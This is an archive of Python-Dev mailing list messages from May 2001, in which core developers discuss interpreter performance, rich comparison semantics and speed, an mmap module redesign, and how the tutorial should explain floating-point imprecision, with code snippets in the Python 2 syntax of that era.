From mal at lemburg.com  Sun May 20 18:19:29 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 18:19:29 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>
Message-ID: <3B07EE91.5747F4F4@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > How about making performance the main "feature" for 2.3 then ?!
> 
> Guido may be a dictator, but he doesn't have a magic wand -- "the main
> feature" is what people volunteer to do and then fight for and then actually
> do.

I will certainly go back to the basics and redo my optimization
patches for Python later this year. Whether or not these will
get included in the core is another story, but I have a need for
a fast interpreter for my app. server and can't afford losing
too much performance when moving from 1.5.x to 2.x.
 
> > 2.0 - 2.2 introduced many new features in the interpreter core,
> > so I think it's time to stabilize those features and focus on
> > making Python regain the performance it had before those features
> > were introduced.  At least to some of us, performance is an
> > issue and I think that there's a lot we can do to improve it.
> 
> "Performance" is meaningless unless quantified and made concrete:  what is it
> that runs too slowly?  "Everything" is not a useful answer.  Speeding up
> line-at-a-time input was an example of something that worked, via focus and
> measurement and pushing ahead despite opposition.  I doubt any other approach
> will bear fruit over such a short timeframe, and especially not without
> resources to throw at it.

Let's put it this way: if pystone gets a 50% boost, then all
applications should benefit from it regardless of whether they
are function call intense or fiddle with a lot of attributes.
Achieving those 50% will be a lot harder than for the 1.5
series, though ;-)
 
> > One way to open up the field for better performance will be
> > to modularize the interpreter, so that new ways of optimization
> > can be explored, e.g. truning the VM a register machine
> > (Skip once started looking into this with his Rattlesnake
> > patches) or creating specialized VMs which can then be used
> > by optimizing compilers as targets.
> 
> Restructure the core for the benefit of optimizing compilers that don't
> exist?  That sounds like an interesting research project, but not much to do
> with making 2.3 faster.  In the meantime, modularization is more likely to
> make the VM that does exist slower.

Depends on how you look at it: extension writers will then
have the possibility of plugging in new compilers and VMs
into Python to experiment with new optimization strategies.

The Rattlesnake project is one such project which would do
great with this plugin logic since it uses special opcodes
which an optimizer generates and then needs a modified VM
to execute these new byte code streams...

from Rattlesnake import compiler, vm
sys.use_compiler(compiler)
sys.use_vm(vm)

This won't make stock Python 2.3 faster, but at least provide
better means for experiments in that direction.
Alternative VM implementations like Stackless Python would 
also benefit from it.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sun May 20 23:13:04 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:13:04 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>

[Martin v. Loewis, on pointer-equality tests in string_compare()]

> I've done some measurements here, too, again taking your example
> ...
>     for i in indices:
>         "ab" < "ab"
> ...
> This is the case where testing for identity helps. Running it without
> identity test takes 0.74s, running it with identity test takes 0.68s.

This stuff all ties together.  A pointer-equality test in string_compare() is
guaranteed to lose every time string_compare() gets called from
lookdict_string().  Let's lose string_compare() entirely (in favor of a
string_richcompare that is self-contained apart from memcmp()).


From tim.one at home.com  Sun May 20 23:37:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 17:37:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGIKDAA.tim.one@home.com>

[Tim, muses about a Py_CMP value for rich comparisons, and talks
 mostly about dict comps]

> ...
> I'm not sure I see the saving.  There's no real saving in time,
> because you still have to make separate calls for EQ and CMP, right?

Right so far as it goes.  A "fast path" (which currently doesn't exist but is
clearly worth adding, based on both my and Martin's timings) for doing *all*
kinds of same-type comparisons would only have to look for a richcompare
slot, though, not one kind of slot in some cases and another in others.
Uniformity is contagious <wink>.

> There might be a saving in code, but you could solve that internally
> in dictobject.c by restructuring the code somewhat so that
> dict_compare shared more with dict_richcompare, right?

Right, there would be no reduction in total code, and the dict routines
already share as much as possible.  In effect, the body of dict_compare would
replace the last

		res = Py_NotImplemented;

line in the (currently tiny) dict_richcompare guarded by the appropriate
tests.

> It's mostly an API streamlining.

Bingo, and the possibility of retiring the tp_compare slot in P3K.

> The other difference between tp_compare and tp_richcompare is that
> the latter returns an object which makes testing for errors unambiguous.

Also cool.

> But (for several releases) we would still have to support tp_compare
> for b/w compatibility with old 3r party extensions.

Sure, although the way the CVS branch code is going it could be that 2.2 is
the long-awaited utterly incompatible P3K anyway <wink>.

>> The list and tuple richcmps are also doing almost all the work needed
>> to compute a 3-way cmp outcome.

> Ditto.

Oh no!  Those aren't like dict compares.  A rich compare for sequence types
(whether strings or lists) *has* to contain almost all the code necessary to
implement cmp(), because just resolving Py_EQ in all cases has to find "the
first" element (if any) that differs.  Once that's known, you're at most one
measly element compare away from producing the right cmp() outcome.  This
isn't true of dict compares:  the algorithm for resolving dict Py_EQ/Py_NE
when the dict sizes are the same doesn't do anything to help resolve general
cmp().  Yes, a tp_compare slot could be re-added to lists and tuples, and
implemented via refactoring their current tp_richcompare code into a common
internal routine, but then we've just added another layer of function calls
for all cases.  I've timed C function calls, and it turns out they aren't
actually free <wink>.
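Here is a sketch of why sequence rich compares already do most of cmp()'s work. Python values stand in for list or tuple items, and `first_difference` and `seq_cmp` are illustrative names, not CPython internals. The scan that resolves Py_EQ finds the first differing index, and a 3-way answer then needs at most one more element compare on that pair. The sketch assumes that unequal items are ordered by `<`.

```python
def first_difference(a, b):
    """Index of the first position where a and b differ (by ==), or None
    if one sequence is a prefix of the other."""
    for i in range(min(len(a), len(b))):
        if not a[i] == b[i]:
            return i
    return None

def seq_cmp(a, b):
    """3-way compare (-1, 0, 1) built on the same scan that Py_EQ needs."""
    i = first_difference(a, b)
    if i is None:
        # No differing item: the shorter sequence is the smaller one.
        return (len(a) > len(b)) - (len(a) < len(b))
    # One extra element compare settles the outcome.
    return -1 if a[i] < b[i] else 1
```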


From tim.one at home.com  Mon May 21 09:53:24 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 03:53:24 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>

[Guido]
> I would like to break this down by defining the mapping between cmp()
> and rich comparisons.

Good idea!

> I propose:
>
> - If cmp() is requested but not defined, and rich comparisons are
>   defined, try ==, <, > in order; if all three yield false, act as if
>   rich comparisons were not defined, and use the fallback comparison
>   (i.e. by address).

Here and below you didn't cover the case where cmp() is requested and *is*
defined.  I believe it's agreed now (but wasn't yet at the time you wrote
this) that cmp() will be called in that case (which requires changes to the
current implementation).
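The first proposed rule derives cmp() from rich comparisons. It can be sketched in modern Python as follows. `cmp_from_rich` is a hypothetical name, and `id()` stands in for the "compare by address" fallback:

```python
def cmp_from_rich(x, y):
    """3-way compare derived from rich comparisons, per the proposed rule.

    Tries ==, <, > in that order; if none is true, falls back to comparing
    object addresses (modelled here with id()).
    """
    if x == y:
        return 0
    if x < y:
        return -1
    if x > y:
        return 1
    # Fallback "by address": arbitrary, but consistent within one run.
    return (id(x) > id(y)) - (id(x) < id(y))
```

NaN is the classic case where all three rich comparisons are false, so it always reaches the fallback.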

> - If a rich comparison is requested but not defined, use cmp() and use
>   the obvious mapping.

Cool, except this is missing what I believe was intended detail, like that
when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be
tried before falling back to cmp().  Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented

    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know how to explain why each method gets called twice (well, I do,
but it's hard to swallow <wink>).  Again this can have semantic consequences,
e.g. if the methods have side-effects; and it's unclear whether this is
intended, a bug, or implementation-defined.
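The "obvious mapping" from a 3-way result to the six rich operators, combined with the reflection order described above (x.__lt__(y), then y.__gt__(x), then cmp()), might look like this. It is only a sketch under stated assumptions. `rich_compare` and its `cmp3` argument are hypothetical, each method is called once, and modern Python's rule of trying a subclass's reflected method first is not modelled.

```python
# Reflected operator for each rich comparison: x < y  <=>  y > x, etc.
_REFLECTED = {"lt": "gt", "le": "ge", "gt": "lt", "ge": "le",
              "eq": "eq", "ne": "ne"}

# Obvious mapping from a 3-way result c (negative, zero, positive) to each op.
_FROM_CMP = {
    "lt": lambda c: c < 0, "le": lambda c: c <= 0,
    "eq": lambda c: c == 0, "ne": lambda c: c != 0,
    "gt": lambda c: c > 0, "ge": lambda c: c >= 0,
}

def rich_compare(x, y, op, cmp3):
    """Evaluate `x op y`: x's method, then y's reflected method, then cmp3."""
    method = getattr(type(x), "__%s__" % op, None)
    if method is not None:
        result = method(x, y)
        if result is not NotImplemented:
            return result
    reflected = getattr(type(y), "__%s__" % _REFLECTED[op], None)
    if reflected is not None:
        result = reflected(y, x)
        if result is not NotImplemented:
            return result
    # Neither side implemented it: fall back to the 3-way comparison.
    return _FROM_CMP[op](cmp3(x, y))
```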

> - Continue to define the comparison of unequal sequences in terms of
>   cmp().

"the comparison" is ambiguous there:  you mean all comparisons?  just cmp()
comparisons?  just rich comparisons?

In any case, it's also unclear what "in terms of cmp()" means:  that every pair of
corresponding elements must be compared via cmp()?  Or that only the first
non-Py_EQ pair must be compared via cmp()?  Pseudo-code would be much clearer
than English here.
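In that spirit, here is pseudo-code for one reading, written as runnable Python. Scan with == for the first unequal pair, then apply the requested operator only to that pair, or to the lengths if no pair differs. This is how modern CPython's list and tuple comparisons behave. `seq_richcompare` itself is a hypothetical helper, and `op` is taken from the `operator` module:

```python
import operator

def seq_richcompare(a, b, op):
    """Compare sequences a and b with op (e.g. operator.lt)."""
    # Find the first index whose items are not ==.
    n = min(len(a), len(b))
    i = 0
    while i < n and a[i] == b[i]:
        i += 1
    if i == n:
        # No differing item: compare the lengths with the requested op.
        return op(len(a), len(b))
    # Items at i differ, so == and != are already decided.
    if op is operator.eq:
        return False
    if op is operator.ne:
        return True
    # Only this one pair is compared with the requested operator.
    return op(a[i], b[i])
```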

> - Testing == or != for sequences takes these shortcuts:

Must take these shortcuts, or may take these shortcuts?

>   1. if the lengths differ, the sequences differ

Note that I removed the tuple_richcompare code for doing this, because I
never found a case where tuples were compared via Py_EQ/Py_NE and the lengths
differed.  So the length-check in this case was a waste of time.  It isn't
true of lists or strings that it's a waste of time, but I believe there are
strong reasons for why programs simply will not compare different-sized
tuples for equality.  I would not like to pay for tuple length checks if only
one case in 500 billion would benefit, but if #1 is a mandatory shortcut
there's no choice.
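Whether shortcut #1 is mandatory affects cost, not the answer. Without the shortcut, the element loop still has to notice a length mismatch once one sequence runs out. A sketch with a hypothetical `seq_eq` and a `check_length` flag:

```python
def seq_eq(a, b, check_length=True):
    """Sequence equality, optionally taking the 'lengths differ' shortcut."""
    if check_length and len(a) != len(b):
        return False                  # shortcut: no element compares at all
    for x, y in zip(a, b):
        if not x == y:
            return False
    return len(a) == len(b)           # still needed when the shortcut is off
```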

>   2. compare the elements using == until a false return is found

Currently the sequence rich-compare code does #2 for all 6 comparison
operators.  Is that wrong?  Looked reasonable to me!

> Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
> easily go the extra mile and define != to use only != on the items;
> but is this worth the extra complexity?

Not at all:  tuples and lists are Python's sequence types, so Python is
entitled to define what comparison means for them in any way it likes.  We've
already got cases where (see the first msg in this thread)

    [x] cmpop [y]

may yield a different result than

    x cmpop y

so we've already punted on doing the best-possible job of mimicking whatever
crazy-ass comparisons user-defined objects implement, when those objects are
contained in Python sequences.
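Here is a concrete instance in modern CPython, which is not necessarily the example from the first message. Container comparisons test items for identity before calling ==. As a result, a NaN inside a list compares equal to itself, even though the bare NaN does not.

```python
nan = float("nan")

bare = nan == nan            # IEEE 754: NaN is not equal to anything
wrapped = [nan] == [nan]     # list comparison checks item identity first
```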

My bias is showing <wink>:  I want Python's builtin sequence types to be as
efficient as possible.

Nasty example:  two conformable (same rank and dimensions) NumPy matrices A
and B return a conformable matrix of 0/1 bits when compared via "<" (well,
maybe they actually don't, but that's what drove richcmps to begin with!).
It may well be *convenient* for them if

    (A1, A2, A3) < (B1, B2, B3)

always returned a list (or tuple) of 3 0/1 matrices too:

    [A1 < B1, A2 < B2, A3 < B3]

So builtin sequence comparisons can't be all things to all people regardless.


From Barrett at stsci.edu  Mon May 21 14:17:09 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Mon, 21 May 2001 08:17:09 -0400
Subject: [Python-Dev] mmap module
References: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>
Message-ID: <3B090745.5D70353E@STScI.Edu>

Tim Peters wrote:
> 
> [Paul Barrett]
> > In the CVS log of the mmapmodule.c, Tim Peters says:
> >
> > "The code really needs to be rethought from scratch (not by me, though
> > ...)."
> 
> That was in specific reference to the code I changed, in mmap_find_method.
> The difficulty is that mmap is great for "large files", but the code before
> my change used a C int for the starting offset and also for the return
> value; I boosted those to a C long, which covers 63 bits on 64-bit Linux
> boxes, but doesn't help 64-bit Windows at all (where a C long remains 4
> bytes).  The mmap_object struct uses size_t to declare the relevant members,
> which is possibly better still than C long, but may still leave platform
> capabilities out of reach for large files (e.g., "even Win95" *allows*
> specifying 64-bit offsets when creating a mapped file view).  C is a
> friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue()
> don't cater to the full range of C integral types anyway.  In other words,
> if this code is ever to reach its full potential, it "really needs to be
> rethought from scratch".

OK, thanks for the clarification.

> > The ability to have offsets into a file that are not multiples of the
> > system pagesize would also be nice.
> 
> It's OS-specific.  Python should grow warts to protect against it on the
> OSes that care.

Well, hopefully the OS-differences wouldn't prevent implementing a
more abstract interface.
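Today's mmap module accepts an offset argument, but that offset must be a multiple of mmap.ALLOCATIONGRANULARITY. The sketch below shows how a more abstract interface could hide the restriction: it maps from the aligned offset at or below the requested one and slices off the slack. `map_region` is a hypothetical helper. To keep the example short, it returns a copy rather than a live view, and it assumes the requested range lies inside the file.

```python
import mmap

def map_region(f, offset, length):
    """Return bytes [offset, offset + length) of the open file f via mmap,
    allowing offsets that are not multiples of the allocation granularity."""
    granularity = mmap.ALLOCATIONGRANULARITY
    aligned = (offset // granularity) * granularity   # round down
    slack = offset - aligned                          # bytes to skip
    with mmap.mmap(f.fileno(), slack + length,
                   access=mmap.ACCESS_READ, offset=aligned) as m:
        return m[slack:slack + length]
```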

> > I'd be willing to submit a PEP on a new mmapmodule, once I know what
> > others would like.
> 
> Hard to say.  This has the potential to become Python's next thread
> subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
> you do write a PEP, I vote to say that we'll cover Windows and Linux (and
> maybe Mac OS X?) out of the box, but any other platform is at your own risk
> (it doesn't really help if somebody pops up volunteering to support a
> minority platform, because they eventually go away, their code stops
> working, and it never gets fixed -- so it's use-at-your-own-risk in reality
> regardless).

Yes, I agree.  Windows, Unix/Linux, and Mac OS X should be the
supported platforms.

My intention is not to make major changes to the Python interface, but
to fix bugs and to implement some additional features, such as a
non-pagesize file offset.  I'll try to get something written up in the
near future.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 18:44:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 18:44:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de>

> This stuff all ties together.  A pointer-equality test in string_compare() is
> guaranteed to lose every time string_compare() gets called from
> lookdict_string().  Let's lose string_compare() entirely (in favor of a
> self-contained-- apart from memcmp() --string_richcompare).

Ok. I've now updated my patch on SF to remove string_compare, inline
everything into string_richcompare, add _PyString_Eq, and use that in
lookdict_string. Who would want to review and approve/reject this
patch?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 21 19:03:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 19:03:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>

> Note that the usual way to write this is
> 
>  		if (c < 0 && PyErr_Occurred())
> 
> More work for my artificial "ab" < "cd" case but a net win in real life (when
> c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
> when c < 0 there's no way in the cmp protocol to use c's value alone to
> distinguish between "less than" and "error").
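Here is a small Python model of that protocol. A compare function signals failure by returning -1 and setting a separate error flag. `ErrorIndicator` and `checked_cmp` are hypothetical stand-ins for the thread state and the calling code:

```python
class ErrorIndicator:
    """Stand-in for the interpreter's per-thread "exception pending" flag."""
    def __init__(self):
        self.pending = None

    def occurred(self):
        return self.pending is not None

def checked_cmp(compare, a, b, errors):
    """Call a tp_compare-style function and disambiguate a -1 result."""
    c = compare(a, b)
    # Only a negative result can mean "error", so results of 0 and 1
    # never pay for the error check.
    if c < 0 and errors.occurred():
        raise RuntimeError(errors.pending)
    return c
```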

Ok. I've updated my tp_compare patch on SF to do so; it also
un-deprecates UserList.__cmp__.

> > Here, I get 3 function calls: f is string_compare, then
> > PyErr_Occurred, finally convert_3way_to_object, which converts
> > {-1,0,1} x Op -> {Py_True, Py_False}.
> 
> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

Any reason why PyThreadState_GET isn't used there?

> There's no danger of over-indexing when ob_size==0, because it doesn't
> include the trailing null byte Python always sticks at the end of string
> objects; and the first-byte check is much more likely to pay off than the
> zero-length check (comparison to a null string?  gotta be rare as clear
> conclusions <wink>), and better to test for the more common case first.
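The following models the check order being described, using bytes objects. `string_eq` is a hypothetical name. Each buffer is padded with one NUL to mimic the byte CPython keeps after every string. That trailing byte is what makes reading the first byte safe even when the length is 0. The padding copy exists only for the model; in C it would defeat the point.

```python
def string_eq(a, b):
    """Equality in the order discussed: length, first byte, full compare."""
    if len(a) != len(b):
        return False
    pa, pb = a + b"\0", b + b"\0"   # model the trailing NUL byte
    if pa[0] != pb[0]:              # safe even for empty strings
        return False                # cheap, and usually decisive
    return pa[:len(a)] == pb[:len(b)]   # stand-in for memcmp(a, b, len)
```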

This is now also in the string_richcompare patch on SF.

Regards,
Martin


From tim.one at home.com  Mon May 21 20:29:02 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 21 May 2001 14:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>

[Fred checkin]
> > ***************
> > *** 2610,2617 ****
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200*200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.4, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]
> > --- 2610,2617 ----
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200 * 200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.400000000000002, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]

[Guido]
> Hmm...  The tutorial now contains at least one example of floating
> point imprecision.  Does it also contain text to explain this?  (I'm
> sure Tim would be happy to provide some if there isn't any. :-)

[Fred]
> It contains others, and I don't think there's an explanation.  Some
> text from Tim to explain this would be greatly appreciated!

Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
so long as we rely on the platform C to format floats, the output isn't
well-defined (the last digit or so can and will vary across boxes).

I can certainly explain that this is so, and even why, but unsure the
tutorial is the right place for it.  In any case the tutorial shouldn't be
giving examples whose output is platform-dependent.  For example, don't use
10 * 3.14, use 10 * 3.25.  Want me to scour the tutorial for all such cases?
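The difference between the two suggested constants can be checked with today's decimal module, which postdates this thread. Decimal(float) converts a double exactly, with no rounding, so it shows what the product really is:

```python
from decimal import Decimal

inexact = Decimal(10 * 3.14)   # 3.14 has no exact binary representation
exact = Decimal(10 * 3.25)     # 3.25 == 13/4, so the product is exactly 32.5
```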

Or we could put the attached function at the start of the tutorial and use it
to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that <wink>.


def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)
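f2ds uses Python 2 long literals (0L, 5L), so it won't run unchanged on Python 3. The sketch below performs the same conversion in modern Python. Instead of the frexp/ldexp chunking, it uses `float.as_integer_ratio()`, which returns a reduced fraction whose denominator is a power of 2. Like f2ds, it does not handle infinities or NaNs. `f2ds_modern` is a hypothetical name.

```python
def f2ds_modern(x):
    """Exact decimal string for float x, in f2ds's "[-]digits e exponent" form."""
    if x == 0:
        return "0e0"
    sign = "-" if x < 0 else ""
    num, den = abs(x).as_integer_ratio()   # den is a power of 2
    k = den.bit_length() - 1               # den == 2**k
    # num / 2**k == num * 5**k / 10**k
    top, e = num * 5**k, -k
    while top % 10 == 0:                   # strip trailing decimal zeros
        top //= 10
        e += 1
    return "%s%de%d" % (sign, top, e)
```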


From guido at digicool.com  Mon May 21 21:02:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 15:02:43 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT."
             <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com>

> Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
> so long as we rely on the platform C to format floats, the output isn't
> well-defined (the last digit or so can and will vary across boxes).

I can't check right now, but I thought that this was pretty consistent
across some common platforms?

> I can certainly explain that this is so, and even why, but unsure
> the tutorial is the right place for it.  In any case the tutorial
> shouldn't be giving examples whose output is platform-dependent.
> For example, don't use 10 * 3.14, use 10 * 3.25.  Want me to scour
> the tutorial for all such cases?

Are you serious?

This is something that any newbie who is the least bit adventurous
will run into anyway, so I don't think that not talking about this at
all in the tutorial is fair or helpful.  That just perpetuates the
questions from newbies about "floating point is broken" -- since none
of the tutorial examples prepare them for this.

Since this is behavior that is ordinarily observed and perpetually
perplexing, I think it *must* be treated in the tutorial.  The
tutorial doesn't have to have the full explanation -- maybe it's
enough to say something like ``due to round-off errors you will
sometimes see inexact results like 31.400000000000002; don't worry
about this, you can use str() or "%g" (but not round()!) to strip
redundant precision, and here's a URL for more info.''
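Here is a sketch of those options in modern Python. One thing has changed since this thread: in Python 3, str() of a float gives the same shortest round-tripping digits as repr(). So str() alone no longer hides the noise, while "%g" and explicit precisions still do. round() returns another binary double, and that double's exact value is still not the decimal it prints as.

```python
from decimal import Decimal

x = 10 * 3.14

shown_g = "%g" % x               # 6 significant digits, trailing zeros dropped
shown_fixed = format(x, ".2f")   # fixed two decimals
rounded = round(x, 1)            # still a binary double, just a different one
exact_rounded = Decimal(rounded) # its exact value
```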

Or maybe the full story can be an appendix.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:09:04 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:09:04 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM
Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
> Or maybe the full story can be an appendix.

Or maybe Decimal should go in the standard distribution?  What kind of
deadline do I have for finishing that to go into 2.2?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:35:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:35:10 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT."
             <20010521200904.05CAE99C81@waltz.rahul.net> 
References: <20010521200904.05CAE99C81@waltz.rahul.net> 
Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com>

> > Or maybe the full story can be an appendix.
> 
> Or maybe Decimal should go in the standard distribution?  What kind of
> deadline do I have for finishing that to go into 2.2?

Adding Decimal to the distribution is fine.  But using it by default
for floating point literals and other floating point results is a
different story.  The PEP about that hasn't really been discussed
enough to make a decision, but a conservative estimate is that this
change won't be made in 2.2.  So Decimal doesn't solve the problem the
tutorial has.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:42:15 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:42:15 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM
Message-ID: <20010521204215.F216699C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
>>> Or maybe the full story can be an appendix.
>> 
>> Or maybe Decimal should go in the standard distribution?  What kind of
>> deadline do I have for finishing that to go into 2.2?
> 
> Adding Decimal to the distribution is fine.  But using it by default
> for floating point literals and other floating point results is a
> different story.  The PEP about that hasn't really been discussed
> enough to make a decision, but a conservative estimate is that this
> change won't be made in 2.2.  So Decimal doesn't solve the problem the
> tutorial has.

Wasn't thinking of going quite that far, only changing the tutorial to
say something like, "If you want speed, use the hardware FP (which is
directly supported by Python's floating literals); if you want accuracy,
use Decimal."  (Or FixedPoint, which is already in the distribution.)
The full story needn't go in the Appendix; we can simply refer people to
Cowlishaw and Kahan.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:57:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:57:08 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT."
             <20010521204215.F216699C81@waltz.rahul.net> 
References: <20010521204215.F216699C81@waltz.rahul.net> 
Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com>

[Aahz]
> >>> Or maybe the full story can be an appendix.
> >> 
> >> Or maybe Decimal should go in the standard distribution?  What kind of
> >> deadline do I have for finishing that to go into 2.2?

[Guido]
> > Adding Decimal to the distribution is fine.  But using it by default
> > for floating point literals and other floating point results is a
> > different story.  The PEP about that hasn't really been discussed
> > enough to make a decision, but a conservative estimate is that this
> > change won't be made in 2.2.  So Decimal doesn't solve the problem the
> > tutorial has.

[Aahz]
> Wasn't thinking of going quite that far, only changing the tutorial to
> say something like, "If you want speed, use the hardware FP (which is
> directly supported by Python's floating literals); if you want accuracy,
> use Decimal."  (Or FixedPoint, which is already in the distribution.)
> The full story needn't go in the Appendix; we can simply refer people to
> Cowlishaw and Kahan.

I think that most people don't care about either speed or accuracy,
but (being Python users) everybody cares about convenience, and
convenience is using the built-in floating point literals.  (Also,
most other modules returning or using floating point numbers use
binary floating point, e.g. the time module and of course the math
module.)

As long as the built-in literals are binary floating point, they are
what 99% of the code uses, so we need to explain the pitfalls.

